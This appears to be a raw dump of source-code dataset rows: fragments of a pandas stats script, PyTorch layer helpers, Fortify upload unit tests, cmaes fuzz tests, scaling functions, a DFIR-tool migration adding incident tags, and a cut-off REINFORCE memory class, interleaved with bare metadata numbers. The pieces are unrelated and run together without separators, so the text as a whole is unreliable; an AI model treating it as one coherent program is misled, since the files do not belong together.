108,102,166,88,76,46,110,79,172,137,86,157,147,210,98,161,88,114,89,102,177,123,127,234,230,93,146,190,100,146,167,51,232,89,96,65,206,113,214,98,95,175,41,61,86,166,48,119,91,159,118,180,102,171,35,87,124,120,100,162,100,103,153,65,91,166,141,48,46,92,290,274,277,111,176,92,252,114,188,131,138,242,95,152,181,96,168,86,148,104,138,208,105,150,214,258,83,152,93,22,67,50,71,43,89,86,153,243,238,172,96,229,113,275,95,162,96,192,111,98,107,107,155,144,136,201,292,118,188,100,65,45,65,92,163,45,65,134,92,156,139,139,206,39,49,94,91,150,107,152,80,149,48,68,87,151,93,92,153,92,153,90,154,93,159,92,86,156,85,145,180,154,102,20,56,83,84,57,161,111,94,128,96,43,120,89,151,157,92,181,194,90,107,93,91,135,94,185,20,95,122,90,154,107,91,160,85,116,88,89,147,119,188,66,166,113,134,170,90,92,159,135,155,89,148,85,111,88,130,97,159,96,154,159,218,221,174,197,200,202,327,480,489,488,75,255,141,113,157,172,173,95,50,89,191,192,28,134,135,86,40,154,156,80,133,90,105,110,66,127,136,141,147,117,96,185,185,140,162,127,138,147,163,165,170,140,136,224,276,132,186,185,136,155,156,141,138,109,135,138,62,92,123,145,161,125,137,24,143,188,207,48,105,200,200,88,77,78,99,44,62,115,120,88,92,155,156,91,43,110,81,130,40,63,87,161,92,94,182,151,186,92,200,96,71,96,103,86,154,93,166,45,132,86,146,130,127,204,95,158,91,168,80,239,85,152,115,118,112,85,128,66,133,86,153,90,153,124,139,204,85,155,90,158,92,150,85,96,160,97,199,99,226,84,101,180,81,139,86,156,159,229,92,173,87,110,59,58,47,136,87,154,141,85,169,105,129,152,72,91,93,157,95,186,95,163,47,71,59,84,170,236,106,93,160,59,129,91,156,124,89,160,91,162,97,149,78,148,95,161,91,125,202,135,87,194,114,130,188,90,202,133,170,229,82,146,88,149,88,136,44,114,98,166,98,255,176,112,93,157,79,159,85,146,92,49,127,81,149,47,111,89,148,41,60,133,196,50,75,41,75,41,40,93,93,160,84,145,120,206,105,77,151,90,150,120,
178,42,86,91,157,95,162,175,242,101,121,223,92,164,127,191,157,134,87,187,120,103,47,72,93,157,88,87,145,53,119,52,86,87,87,155,86,92,163,91,113,205,221,221,182,185,185,118,272,141,156,139,125,210,211,243,243,187,155,156,140,222,149,126,149,124,169,178,196,88,97,112,125,131,154,187,46,136,113,142,151,233,122,154,90,164,207,209,209,180,116,190,237,142,171,116,193,44,181,211,115,219,226,282,296,176,274,277,278,217,223,228,168,207,155,137,107,95,158,33,139,147,251,252,79,107,171,134,128,133,21,170,64,204,241,150,151,138,185,176,178,167,179,32,134,55,129,145,94,95,54,109,119,172,186,185,173,126,131,112,134,137,179,181,198,198,198,91,126,199,211,216,378,401,403,167,250,257,68,91,189,190,94,44,99,139,188,189,73,127,197,224,142,209,86,128,127,140,148,149,127,138,95,135,216,278,282,132,166,115,140,142,123,167,161,163,53,88,128,140,216,122,171,181,184,47,158,169,51,115,79,87,116,78,77,79,116,183,169,217,228,230,90,158,184,190,137,183,180,186,145,327,341,151,156,160,111,208,250,185,126,72,102,95,127,137,159,144,184,311,313,198,218,218,153,132,181,184,161,172,192,92,139,102,103,181,139,110,217,181,151,106,131,186,153,202,108,105,84,98,134,183,106,148,148,98,226,123,152,154,143,130,186,29,110,128,313,318,318,101,116,160,161,185,191,153,135,181,135,153,77,152,105,156,158,99,174,177,209,167,170,150,165,236,259,150,251,158,128,156,157,183,112,99,108,171,190,200,210,60,93,140,155,145,184,196,154,94,138,128,259,261,158,155,187,194,165,162,176,178,185,191,189,190,48,195,192,205,108,154,174,146,155,117,152,139,83,154,163,158,181,210,220,221,120,258,269,168,183,225,225,227,161,118,184,175,176,159,90,144,155,167,172,188,189,140,146,110,165,180,158,209,252,270,134,136,149,183,186,87,119,131,123,73,152,158,262,265,136,128,152,167,102,134,155,122,170,195,109,145,155,133,297,299,155,203,205,189,127,136,156,145,131,171,184,214,215,139,188,129,160,148,184,109,123,133,77,218,219,121,183,125,146,157,125,137,93,128,96,142,149,151,111,114,60,128,257,75,154,211,220,142,126,59,129,157,37,60,28,64,104,91,105,184,69,245,190,172,143,230,172,234,228,92,123,146,164,143,134,103,148,214,215,64,89,133,222,26,165,166,92,105,247,52,77,112,172,151,174,195,62,182,181,183,146,224,232,134,177,141,192]} ''' #%% import pandas as pd statsx = pd.DataFrame([dict(type=typ, val=val) for typ, vals in json.loads(stats).items() if isinstance(vals, list) for val in vals]) print(len(statsx)) import seaborn as sns sns.violinplot(x='type', y='val', data=statsx) statsx.groupby('type').describe() #%% statsx.groupby('type').sem()
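For reference, a runnable form of the analysis cell at the end of the script above is sketched here. Note that `json` is called but not imported anywhere in the visible portion of the script, so the import below is an assumption that it did not already appear in an earlier cell.

#%%
import json

import pandas as pd
import seaborn as sns

# Flatten every list-valued field of the stats JSON into (type, val) rows;
# scalar fields such as "numInflight" are skipped by the isinstance check.
statsx = pd.DataFrame([
    dict(type=typ, val=val)
    for typ, vals in json.loads(stats).items()
    if isinstance(vals, list)
    for val in vals
])
print(len(statsx))

# Compare the per-type value distributions and summarize them.
sns.violinplot(x='type', y='val', data=statsx)
statsx.groupby('type').describe()

#%%
statsx.groupby('type').sem()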
1,818.392157
31,528
0.724094
25,319
92,738
2.652198
0.029464
0.000357
0.001266
0.001713
0.001057
0.001057
0.000923
0
0
0
0
0.718732
0.001272
92,738
51
31,529
1,818.392157
0.006284
0.002696
0
0.461538
0
0.230769
0.995533
0.995241
0
0
0
0
0
1
0
false
0
0.115385
0
0.115385
0.038462
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
1
1
1
0
0
0
0
1
1
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
bb8ae6f522615ab552ced896af3f167bd6aec741
1,671
py
Python
new_models/modules.py
BoyuanChen/visual_behavior_modeling
8b6eb0516c562306c5d775632223ad0de775f170
[ "MIT" ]
9
2019-12-04T12:50:43.000Z
2021-02-28T13:45:30.000Z
new_models/modules.py
BoyuanChen/visual_behavior_modeling
8b6eb0516c562306c5d775632223ad0de775f170
[ "MIT" ]
null
null
null
new_models/modules.py
BoyuanChen/visual_behavior_modeling
8b6eb0516c562306c5d775632223ad0de775f170
[ "MIT" ]
2
2020-07-09T20:35:15.000Z
2020-11-16T14:03:10.000Z
import torch

def conv2d_bn_leakrelu(inch,outch,kernel_size,stride=1,padding=1):
    convlayer = torch.nn.Sequential(
        torch.nn.Conv2d(inch,outch,kernel_size=kernel_size,stride=stride,padding=padding),
        torch.nn.BatchNorm2d(outch),
        torch.nn.LeakyReLU()
    )
    return convlayer

def conv2d_bn_relu(inch,outch,kernel_size,stride=1,padding=1):
    convlayer = torch.nn.Sequential(
        torch.nn.Conv2d(inch,outch,kernel_size=kernel_size,stride=stride,padding=padding),
        torch.nn.BatchNorm2d(outch),
        torch.nn.ReLU()
    )
    return convlayer

def deconv_tanh(inch,outch,kernel_size,stride=1,padding=1):
    convlayer = torch.nn.Sequential(
        torch.nn.ConvTranspose2d(inch,outch,kernel_size=kernel_size,stride=stride,padding=padding),
        torch.nn.Tanh()
    )
    return convlayer

def deconv_sigmoid(inch,outch,kernel_size,stride=1,padding=1):
    convlayer = torch.nn.Sequential(
        torch.nn.ConvTranspose2d(inch,outch,kernel_size=kernel_size,stride=stride,padding=padding),
        torch.nn.Sigmoid()
    )
    return convlayer

def deconv_leakrelu(inch,outch,kernel_size,stride=1,padding=1):
    convlayer = torch.nn.Sequential(
        torch.nn.ConvTranspose2d(inch,outch,kernel_size=kernel_size,stride=stride,padding=padding),
        torch.nn.BatchNorm2d(outch),
        torch.nn.LeakyReLU()
    )
    return convlayer

def deconv_relu(inch,outch,kernel_size,stride=1,padding=1):
    convlayer = torch.nn.Sequential(
        torch.nn.ConvTranspose2d(inch,outch,kernel_size=kernel_size,stride=stride,padding=padding),
        torch.nn.BatchNorm2d(outch),
        torch.nn.ReLU()
    )
    return convlayer
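A minimal usage sketch for the layer factories above; the channel counts, kernel sizes, and input shape are illustrative assumptions, not values from the repository.

import torch

# Hypothetical encoder/decoder assembled from the helpers above.
encoder = torch.nn.Sequential(
    conv2d_bn_relu(3, 32, kernel_size=3, stride=2),       # 64x64 -> 32x32
    conv2d_bn_leakrelu(32, 64, kernel_size=3, stride=2),  # 32x32 -> 16x16
)
decoder = torch.nn.Sequential(
    deconv_relu(64, 32, kernel_size=4, stride=2),         # 16x16 -> 32x32
    deconv_sigmoid(32, 3, kernel_size=4, stride=2),       # 32x32 -> 64x64
)
x = torch.randn(1, 3, 64, 64)
y = decoder(encoder(x))  # y.shape == (1, 3, 64, 64)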
32.134615
99
0.715141
218
1,671
5.362385
0.110092
0.131737
0.153978
0.195038
0.901625
0.901625
0.901625
0.901625
0.901625
0.901625
0
0.017204
0.165171
1,671
52
100
32.134615
0.820789
0
0
0.634146
0
0
0
0
0
0
0
0
0
1
0.146341
false
0
0.02439
0
0.317073
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
bbd0cad2550e72eb80c81a2ecd53f3702e81816f
9,886
py
Python
tests/fortify/upload_test.py
matt-fevold/webbreaker
b500fc620ebba03a27321c8f832ab77bb760b9c5
[ "MIT" ]
7
2018-12-20T19:18:43.000Z
2019-12-10T15:03:41.000Z
tests/fortify/upload_test.py
matt-fevold/webbreaker
b500fc620ebba03a27321c8f832ab77bb760b9c5
[ "MIT" ]
5
2019-04-02T17:07:44.000Z
2020-02-17T07:08:11.000Z
tests/fortify/upload_test.py
matt-fevold/webbreaker
b500fc620ebba03a27321c8f832ab77bb760b9c5
[ "MIT" ]
7
2019-01-10T10:40:55.000Z
2022-03-13T14:08:37.000Z
import mock
import pytest

from webbreaker.fortify.upload import FortifyUpload


def unbound_local_error_exception(**kwargs):
    raise UnboundLocalError('Test Failure')


def value_error_exception(**kwargs):
    raise ValueError('Test Failure')


def io_error_exception(**kwargs):
    raise IOError('Test Failure')


@mock.patch('webbreaker.fortify.upload.FortifyUpload.upload')
@mock.patch('webbreaker.fortify.upload.FortifyAuth')
@mock.patch('webbreaker.fortify.upload.FortifyConfig')
def test_fortify_upload_successful_init_application_name_scan_name_not_none(config_mock, auth_mock, upload_mock):
    expected_username = 'user'
    expected_password = 'password'
    expected_application = 'Test Application'
    expected_version = 'Test Version'
    expected_scan_name = 'Test Scan Name'
    expected_project_template = 'Test Template'

    auth_mock.return_value.authenticate.return_value = expected_username, expected_password
    config_mock.return_value.project_template = expected_project_template
    config_mock.project_template()

    fortify_upload = FortifyUpload(username=None, password=None, application_name=expected_application,
                                   version_name=expected_version, scan_name=expected_scan_name, custom_value=None)

    assert fortify_upload.username == expected_username
    assert fortify_upload.password == expected_password
    upload_mock.assert_called_once_with(expected_application, expected_version, expected_project_template,
                                        expected_scan_name, None)
    assert config_mock.call_count == 1
    assert auth_mock.call_count == 1
    assert upload_mock.call_count == 1


@mock.patch('webbreaker.fortify.upload.FortifyUpload.upload')
@mock.patch('webbreaker.fortify.upload.FortifyAuth')
@mock.patch('webbreaker.fortify.upload.FortifyConfig')
def test_fortify_upload_successful_init_scan_name_is_none(config_mock, auth_mock, upload_mock):
    expected_username = 'user'
    expected_password = 'password'
    expected_application = 'Test Application'
    expected_version = 'Test Version'
    expected_project_template = 'Test Template'

    auth_mock.return_value.authenticate.return_value = expected_username, expected_password
    config_mock.return_value.project_template = expected_project_template

    fortify_upload = FortifyUpload(username=None, password=None, application_name=expected_application,
                                   version_name=expected_version, scan_name=None, custom_value=None)

    assert fortify_upload.username == expected_username
    assert fortify_upload.password == expected_password
    # If scan_name is None, scan_name will equal version_name
    upload_mock.assert_called_once_with(expected_application, expected_version, expected_project_template,
                                        expected_version, None)
    assert config_mock.call_count == 1
    assert auth_mock.call_count == 1
    assert upload_mock.call_count == 1


@mock.patch('webbreaker.fortify.upload.FortifyUpload.upload')
@mock.patch('webbreaker.fortify.upload.FortifyAuth')
@mock.patch('webbreaker.fortify.upload.FortifyConfig')
def test_fortify_upload_successful_init_application_name_is_none(config_mock, auth_mock, upload_mock):
    expected_username = 'user'
    expected_password = 'password'
    expected_application = 'Test Application'
    expected_version = 'Test Version'
    expected_scan_name = 'Test Scan Name'
    expected_project_template = 'Test Template'

    auth_mock.return_value.authenticate.return_value = expected_username, expected_password
    config_mock.return_value.project_template = expected_project_template
    config_mock.return_value.application_name = expected_application

    fortify_upload = FortifyUpload(username=None, password=None, application_name=None,
                                   version_name=expected_version, scan_name=expected_scan_name, custom_value=None)

    assert fortify_upload.username == expected_username
    assert fortify_upload.password == expected_password
    # If scan_name is None, scan_name will equal version_name
    upload_mock.assert_called_once_with(expected_application, expected_version, expected_project_template,
                                        expected_scan_name, None)
    assert config_mock.call_count == 1
    assert auth_mock.call_count == 1
    assert upload_mock.call_count == 1


@mock.patch('webbreaker.fortify.upload.FortifyHelper')
@mock.patch('webbreaker.fortify.upload.FortifyAuth')
@mock.patch('webbreaker.fortify.upload.FortifyConfig')
def test_fortify_upload_upload_successful_upload(config_mock, auth_mock, client_mock):
    expected_username = 'user'
    expected_password = 'password'
    expected_application = 'Test Application'
    expected_version = 'Test Version'
    expected_scan_name = 'Test Scan Name'
    expected_project_template = 'Test Template'
    expected_ssc_url = "test.url"

    auth_mock.return_value.authenticate.return_value = expected_username, expected_password
    config_mock.return_value.project_template = expected_project_template
    config_mock.return_value.ssc_url = expected_ssc_url

    fortify_upload = FortifyUpload(username=expected_username, password=expected_password,
                                   application_name=expected_application, version_name=expected_version,
                                   scan_name=expected_scan_name, custom_value=None)

    assert fortify_upload.username == expected_username
    assert fortify_upload.password == expected_password
    client_mock.assert_called_once_with(fortify_password='password', fortify_url='test.url', fortify_username='user')
    assert config_mock.call_count == 1
    assert auth_mock.call_count == 1
    assert client_mock.call_count == 1


@mock.patch('webbreaker.fortify.upload.FortifyHelper')
@mock.patch('webbreaker.fortify.upload.FortifyAuth')
@mock.patch('webbreaker.fortify.upload.FortifyConfig')
@mock.patch('webbreaker.fortify.upload.Logger.app.critical')
def test_fortify_upload_upload_throws_value_error(log_mock, config_mock, auth_mock, client_mock):
    expected_username = 'user'
    expected_password = 'password'
    expected_application = 'Test Application'
    expected_version = 'Test Version'
    expected_scan_name = 'Test Scan Name'
    expected_project_template = 'Test Template'

    auth_mock.return_value.authenticate.return_value = expected_username, expected_password
    config_mock.return_value.project_template = expected_project_template
    config_mock.project_template()
    client_mock.side_effect = value_error_exception

    with pytest.raises(SystemExit):
        FortifyUpload(username=expected_username, password=expected_password,
                      application_name=expected_application, version_name=expected_version,
                      scan_name=expected_scan_name, custom_value=None)

    log_mock.assert_called_once()


@mock.patch('webbreaker.fortify.upload.FortifyHelper')
@mock.patch('webbreaker.fortify.upload.FortifyAuth')
@mock.patch('webbreaker.fortify.upload.FortifyConfig')
@mock.patch('webbreaker.fortify.upload.Logger.app.error')
def test_fortify_upload_upload_throws_unbound_local_error(log_mock, config_mock, auth_mock, client_mock):
    expected_username = 'user'
    expected_password = 'password'
    expected_application = 'Test Application'
    expected_version = 'Test Version'
    expected_scan_name = 'Test Scan Name'
    expected_project_template = 'Test Template'

    auth_mock.return_value.authenticate.return_value = expected_username, expected_password
    config_mock.return_value.project_template = expected_project_template
    config_mock.project_template()
    client_mock.side_effect = unbound_local_error_exception

    with pytest.raises(SystemExit):
        FortifyUpload(username=expected_username, password=expected_password,
                      application_name=expected_application, version_name=expected_version,
                      scan_name=expected_scan_name, custom_value=None)

    log_mock.assert_called_once()


@mock.patch('webbreaker.fortify.upload.FortifyHelper')
@mock.patch('webbreaker.fortify.upload.FortifyAuth')
@mock.patch('webbreaker.fortify.upload.FortifyConfig')
@mock.patch('webbreaker.fortify.upload.Logger.app.critical')
def test_fortify_upload_upload_throws_io_error(log_mock, config_mock, auth_mock, client_mock):
    expected_username = 'user'
    expected_password = 'password'
    expected_application = 'Test Application'
    expected_version = 'Test Version'
    expected_scan_name = 'Test Scan Name'
    expected_project_template = 'Test Template'

    auth_mock.return_value.authenticate.return_value = expected_username, expected_password
    config_mock.return_value.project_template = expected_project_template
    config_mock.project_template()
    client_mock.side_effect = io_error_exception

    with pytest.raises(SystemExit):
        FortifyUpload(username=expected_username, password=expected_password,
                      application_name=expected_application, version_name=expected_version,
                      scan_name=expected_scan_name, custom_value=None)

    log_mock.assert_called_once()
43.170306
117
0.713635
1,067
9,886
6.243674
0.06373
0.08586
0.08631
0.093666
0.927049
0.922546
0.917742
0.917742
0.917742
0.907986
0
0.001544
0.21404
9,886
228
118
43.359649
0.855856
0.011228
0
0.838889
0
0
0.151146
0.098035
0
0
0
0
0.15
1
0.055556
false
0.144444
0.016667
0
0.072222
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
8
a567607f79b30c0e24eab59212ea018ac886f35f
2,051
py
Python
tests/test_fuzzing.py
odidev/cmaes
a10ac399aec7ce759f29ae3ea9611e10ca647f1c
[ "MIT" ]
134
2020-01-31T01:17:33.000Z
2021-08-14T18:36:00.000Z
tests/test_fuzzing.py
odidev/cmaes
a10ac399aec7ce759f29ae3ea9611e10ca647f1c
[ "MIT" ]
74
2020-01-30T20:18:09.000Z
2021-04-10T16:53:31.000Z
tests/test_fuzzing.py
odidev/cmaes
a10ac399aec7ce759f29ae3ea9611e10ca647f1c
[ "MIT" ]
32
2020-01-30T20:32:51.000Z
2021-07-21T14:09:06.000Z
import hypothesis.extra.numpy as npst
import unittest
from hypothesis import given, strategies as st

from cmaes import CMA, SepCMA


class TestFuzzing(unittest.TestCase):
    @given(
        data=st.data(),
    )
    def test_cma_tell(self, data):
        dim = data.draw(st.integers(min_value=2, max_value=100))
        mean = data.draw(npst.arrays(dtype=float, shape=dim))
        sigma = data.draw(st.floats(min_value=1e-16))
        n_iterations = data.draw(st.integers(min_value=1))
        try:
            optimizer = CMA(mean, sigma)
        except AssertionError:
            return
        popsize = optimizer.population_size
        for _ in range(n_iterations):
            tell_solutions = data.draw(
                st.lists(
                    st.tuples(npst.arrays(dtype=float, shape=dim), st.floats()),
                    min_size=popsize,
                    max_size=popsize,
                )
            )
            optimizer.ask()
            try:
                optimizer.tell(tell_solutions)
            except AssertionError:
                return
            optimizer.ask()

    @given(
        data=st.data(),
    )
    def test_sepcma_tell(self, data):
        dim = data.draw(st.integers(min_value=2, max_value=100))
        mean = data.draw(npst.arrays(dtype=float, shape=dim))
        sigma = data.draw(st.floats(min_value=1e-16))
        n_iterations = data.draw(st.integers(min_value=1))
        try:
            optimizer = SepCMA(mean, sigma)
        except AssertionError:
            return
        popsize = optimizer.population_size
        for _ in range(n_iterations):
            tell_solutions = data.draw(
                st.lists(
                    st.tuples(npst.arrays(dtype=float, shape=dim), st.floats()),
                    min_size=popsize,
                    max_size=popsize,
                )
            )
            optimizer.ask()
            try:
                optimizer.tell(tell_solutions)
            except AssertionError:
                return
            optimizer.ask()
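These Hypothesis-driven fuzz tests are ordinarily collected by a test runner; a typical invocation (assuming pytest is available, which also collects unittest.TestCase classes) would be:

python -m pytest tests/test_fuzzing.py -q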
32.046875
80
0.542662
222
2,051
4.887387
0.256757
0.073733
0.073733
0.066359
0.853456
0.853456
0.812903
0.812903
0.812903
0.812903
0
0.012186
0.359824
2,051
63
81
32.555556
0.814166
0
0
0.745763
0
0
0
0
0
0
0
0
0.067797
1
0.033898
false
0
0.067797
0
0.186441
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
a569d1530bd7c7f7425be21e8084b5c7a174d752
59
py
Python
agents/new_agent/__init__.py
pmkumar1308/Connect4_PCP2021
a9ad8a4c3f5eed7b7ddabe2a41446b5e34541b84
[ "MIT" ]
null
null
null
agents/new_agent/__init__.py
pmkumar1308/Connect4_PCP2021
a9ad8a4c3f5eed7b7ddabe2a41446b5e34541b84
[ "MIT" ]
null
null
null
agents/new_agent/__init__.py
pmkumar1308/Connect4_PCP2021
a9ad8a4c3f5eed7b7ddabe2a41446b5e34541b84
[ "MIT" ]
null
null
null
from .mcts_agent import generate_move_mcts as gen_move_mcts
59
59
0.898305
11
59
4.363636
0.727273
0.333333
0
0
0
0
0
0
0
0
0
0
0.084746
59
1
59
59
0.888889
0
0
0
1
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
3c0e12e202474c0153b7101e4b983b6ea64e2968
2,804
py
Python
msap/modeling/model_selection/preprocessing/scale.py
asmyoo/MSAP
0ed89f90d67260892a8c4d945504f3b0a2096d36
[ "MIT" ]
null
null
null
msap/modeling/model_selection/preprocessing/scale.py
asmyoo/MSAP
0ed89f90d67260892a8c4d945504f3b0a2096d36
[ "MIT" ]
null
null
null
msap/modeling/model_selection/preprocessing/scale.py
asmyoo/MSAP
0ed89f90d67260892a8c4d945504f3b0a2096d36
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*-
"""Scaling methods.

Authors:
    Fangzhou Li - fzli@ucdavis.edu

"""
from sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler
import pandas as pd


def standardize(X_df, cat_vars):
    """Apply standardization to the input data.

    Args:
        X_df (pd.DataFrame): Input data.
        cat_vars (List): Indices of columns that are categorical.

    Returns:
        (pd.DataFrame): Scaled data.

    """
    if cat_vars is None:
        X_array = X_df.to_numpy()
        scaler = StandardScaler().fit(X_array)
        return pd.DataFrame(
            scaler.transform(X_array),
            index=X_df.index,
            columns=X_df.columns)
    else:
        X_scalar = X_df.drop(X_df.iloc[:, cat_vars], axis=1)
        X_array = X_scalar.to_numpy()
        scaler = StandardScaler().fit(X_array)
        scaled = pd.DataFrame(
            scaler.transform(X_array),
            index=X_scalar.index,
            columns=X_scalar.columns)
        return pd.concat([scaled, X_df.iloc[:, cat_vars]], axis=1)


def minmax_normalize(X_df, cat_vars):
    """Apply MinMax normalization to the input data.

    Args:
        X_df (pd.DataFrame): Input data.
        cat_vars (List): Indices of columns that are categorical.

    Returns:
        (pd.DataFrame): Scaled data.

    """
    if cat_vars is None:
        X_array = X_df.to_numpy()
        scaler = MinMaxScaler().fit(X_array)
        return pd.DataFrame(
            scaler.transform(X_array),
            index=X_df.index,
            columns=X_df.columns)
    else:
        X_scalar = X_df.drop(X_df.iloc[:, cat_vars], axis=1)
        X_array = X_scalar.to_numpy()
        scaler = MinMaxScaler().fit(X_array)
        scaled = pd.DataFrame(
            scaler.transform(X_array),
            index=X_scalar.index,
            columns=X_scalar.columns)
        return pd.concat([scaled, X_df.iloc[:, cat_vars]], axis=1)


def robust_normalize(X_df, cat_vars):
    """Apply robust normalization to the input data.

    Args:
        X_df (pd.DataFrame): Input data.
        cat_vars (List): Indices of columns that are categorical.

    Returns:
        (pd.DataFrame): Scaled data.

    """
    if cat_vars is None:
        X_array = X_df.to_numpy()
        scaler = RobustScaler().fit(X_array)
        return pd.DataFrame(
            scaler.transform(X_array),
            index=X_df.index,
            columns=X_df.columns)
    else:
        X_scalar = X_df.drop(X_df.iloc[:, cat_vars], axis=1)
        X_array = X_scalar.to_numpy()
        scaler = RobustScaler().fit(X_array)
        scaled = pd.DataFrame(
            scaler.transform(X_array),
            index=X_scalar.index,
            columns=X_scalar.columns)
        return pd.concat([scaled, X_df.iloc[:, cat_vars]], axis=1)
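A small usage sketch for the scalers above; the toy frame is an assumption for illustration, and only the cat_vars=None branch is exercised (it z-scores every column).

import pandas as pd

# Hypothetical numeric frame.
df = pd.DataFrame({
    'age': [21.0, 35.0, 50.0],
    'income': [30000.0, 52000.0, 88000.0],
})
scaled = standardize(df, cat_vars=None)  # per-column zero mean, unit variance
print(scaled)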
26.205607
76
0.600571
368
2,804
4.366848
0.173913
0.044804
0.026136
0.097075
0.883012
0.883012
0.871811
0.790915
0.790915
0.790915
0
0.003504
0.287447
2,804
106
77
26.45283
0.800801
0.236448
0
0.90566
0
0
0
0
0
0
0
0
0
1
0.056604
false
0
0.037736
0
0.207547
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
b1bc10f526fb41ab54c9d50f2013344d522a2b04
1,177
py
Python
dfirtrack_main/migrations/0003_default_tags.py
0xflotus/dfirtrack
632ebe582c2b40a4ac4b9fb12b7a118c2c49ede5
[ "MIT" ]
4
2018-11-13T14:42:20.000Z
2020-01-20T02:31:26.000Z
dfirtrack_main/migrations/0003_default_tags.py
0xflotus/dfirtrack
632ebe582c2b40a4ac4b9fb12b7a118c2c49ede5
[ "MIT" ]
2
2022-02-28T03:40:31.000Z
2022-02-28T03:40:52.000Z
dfirtrack_main/migrations/0003_default_tags.py
0xflotus/dfirtrack
632ebe582c2b40a4ac4b9fb12b7a118c2c49ede5
[ "MIT" ]
2
2022-02-25T08:34:51.000Z
2022-03-16T17:29:44.000Z
# Generated by Django 2.0.2 on 2018-03-20 16:45

from django.db import migrations


class Migration(migrations.Migration):

    dependencies = [
        ('dfirtrack_main', '0002_default_values'),
    ]

    operations = [
        migrations.RunSQL("INSERT INTO dfirtrack_main_tag (tag_name, tagcolor_id) VALUES ('Suspicious', (SELECT tagcolor_id FROM dfirtrack_main_tagcolor WHERE tagcolor_name='orange'));"),
        migrations.RunSQL("INSERT INTO dfirtrack_main_tag (tag_name, tagcolor_id) VALUES ('Backdoor installed', (SELECT tagcolor_id FROM dfirtrack_main_tagcolor WHERE tagcolor_name='red'));"),
        migrations.RunSQL("INSERT INTO dfirtrack_main_tag (tag_name, tagcolor_id) VALUES ('Credential harvesting', (SELECT tagcolor_id FROM dfirtrack_main_tagcolor WHERE tagcolor_name='red'));"),
        migrations.RunSQL("INSERT INTO dfirtrack_main_tag (tag_name, tagcolor_id) VALUES ('Data theft', (SELECT tagcolor_id FROM dfirtrack_main_tagcolor WHERE tagcolor_name='red'));"),
        migrations.RunSQL("INSERT INTO dfirtrack_main_tag (tag_name, tagcolor_id) VALUES ('Important', (SELECT tagcolor_id FROM dfirtrack_main_tagcolor WHERE tagcolor_name='red'));"),
    ]
53.5
195
0.75446
151
1,177
5.596026
0.284768
0.169231
0.130178
0.153846
0.742012
0.742012
0.742012
0.742012
0.742012
0.742012
0
0.018756
0.139337
1,177
21
196
56.047619
0.8154
0.038233
0
0
1
0.416667
0.729204
0.20177
0
0
0
0
0
1
0
false
0
0.166667
0
0.416667
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
1
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
a7106f32824e2aa0bdf07195ba2a6d0587fad6ce
6,304
py
Python
src/gridworld_trainer/reinforce/memory.py
Frederik-L/evaluating-population-based-reinforcement-learning-for-transfer-learning
474a927155a0028d55c4176808aff30f9b5ae97d
[ "MIT" ]
null
null
null
src/gridworld_trainer/reinforce/memory.py
Frederik-L/evaluating-population-based-reinforcement-learning-for-transfer-learning
474a927155a0028d55c4176808aff30f9b5ae97d
[ "MIT" ]
null
null
null
src/gridworld_trainer/reinforce/memory.py
Frederik-L/evaluating-population-based-reinforcement-learning-for-transfer-learning
474a927155a0028d55c4176808aff30f9b5ae97d
[ "MIT" ]
null
null
null
# @title: memory.py
# @author: Jan Frederik Liebig
# @date: 02.09.2021

############################################################
# Imports
from torch.utils.data.sampler import BatchSampler, SubsetRandomSampler
import torch

############################################################
# Code


class MemoryReinforce:
    def __init__(self, rollout_size, obs_size_x, obs_size_y, obs_channel, device):
        """
        Initializes the memory for the reinforce algorithm for 2d stacked frames and single frame type
        @params
            rollout_size the maximum rollout size
            obs_size_x the x size of the observation
            obs_size_y the y size of the observation
            obs_channel the number of channels in the observation
            device the device used in the models
        """
        self.rollout_size = rollout_size
        self.obs_size_x = obs_size_x
        self.obs_size_y = obs_size_y
        self.obs_channel = obs_channel
        self.device = device
        self.reset()

    def insert(self, step, done, action, log_prob, reward, obs):
        """
        Inserts new data in the memory
        @params:
            step the current step
            done true if the state is terminal
            action the used action
            log_prob the logarithmic probability of the action
            reward the received reward
            obs the observation to insert
        """
        self.done[step].copy_(done)
        self.actions[step].copy_(action)
        self.log_probs[step].copy_(log_prob)
        self.rewards[step].copy_(reward)
        self.obs[step].copy_(obs)
        self.obs[step] = self.obs[step].to(self.device)

    def reset(self):
        """
        Resets the memory
        """
        self.done = torch.zeros(self.rollout_size, 1)
        self.returns = torch.zeros(self.rollout_size + 1, 1, requires_grad=False)
        self.actions = torch.zeros(self.rollout_size, 1, dtype=torch.int64)
        self.log_probs = torch.zeros(self.rollout_size, 1)
        self.rewards = torch.zeros(self.rollout_size, 1)
        self.obs = torch.zeros(
            self.rollout_size, self.obs_channel, self.obs_size_x, self.obs_size_y
        )
        self.obs = self.obs.to(self.device)

    def compute_returns(self, gamma):
        """
        Computes the returns for each episode
        @params:
            gamma the discount factor
        """
        self.last_done = (self.done == 1).nonzero().max()
        self.returns[self.last_done + 1] = 0.0
        for step in reversed(range(self.last_done + 1)):
            self.returns[step] = (
                self.returns[step + 1] * gamma * (1 - self.done[step])
                + self.rewards[step]
            )

    def batch_sampler(self, batch_size):
        """
        Samples a batch with the data
        @params:
            batch_size the size of the requested batch
        """
        sampler = BatchSampler(
            SubsetRandomSampler(range(self.last_done)), batch_size, drop_last=True
        )
        for indices in sampler:
            yield self.actions[indices], self.returns[indices], self.obs[indices]


class MemoryReinforce3D:
    def __init__(
